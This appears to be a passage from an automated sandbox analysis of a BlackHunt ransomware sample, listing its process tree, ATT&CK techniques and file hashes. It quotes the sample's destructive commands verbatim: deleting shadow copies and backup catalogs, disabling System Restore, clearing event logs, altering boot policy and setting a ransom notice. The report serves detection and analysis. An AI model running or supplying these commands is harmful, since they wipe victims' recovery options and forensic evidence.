C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:8016
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:4056
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:8636
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:9436
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:9616
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:10896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6896 -ip 68961⤵PID:6840
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:8396
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:11704
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7848
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11604
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:7712
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD534ffd9a5879b2bd8998ad8848e01be03
SHA1c5d18e464742084df4c66671e3f19f0676a0eebe
SHA25651724199c4bcedb39a9b087e2538993e2a0dfe4ed9da0b2c584b72ac8bccb4dd
SHA512ad5ab140255a7b08fa65c8f3fe759724f0fd2822930cc3967f0f18b2a0de24dbc1c5c99b222845ae80a9a30623e615c94905b8a3cd17bb1c7a82e297f07e5fca
-
Filesize
12KB
MD5cdececc2c6af2c130d3a096f9d99453f
SHA1fb1fb939316938e3a09630f8e6332e43c728ad72
SHA2561a0b889618f50ec6be6786b57388ba21afa642151a849453de8d84828cbd9777
SHA5121ab7efbb629401f048daff413c6dba18fc66223a9cbd79918d1ae2969aac32c59f6a542658c7eb6941830ff18901f4f47c00423aec901065800e56d6edcdb9ea
-
Filesize
684B
MD573d409be037325ec6bcb9fa8cc3792d8
SHA11cc6e4dfe598eaf17f8e71b1c69c9a21990ce4aa
SHA25653cd967834176ef49549756fd9a498c1e85ce99c5148a0112cf4c94810eb57aa
SHA5122f9e592f4a180ade5296336d01fdba632eab58d8efefa75db7ef43251c3b9c91bc7c9885e5e804a5d84e838e2c8f2c1976f6dd9e25c52b0f005f00d4e84904f6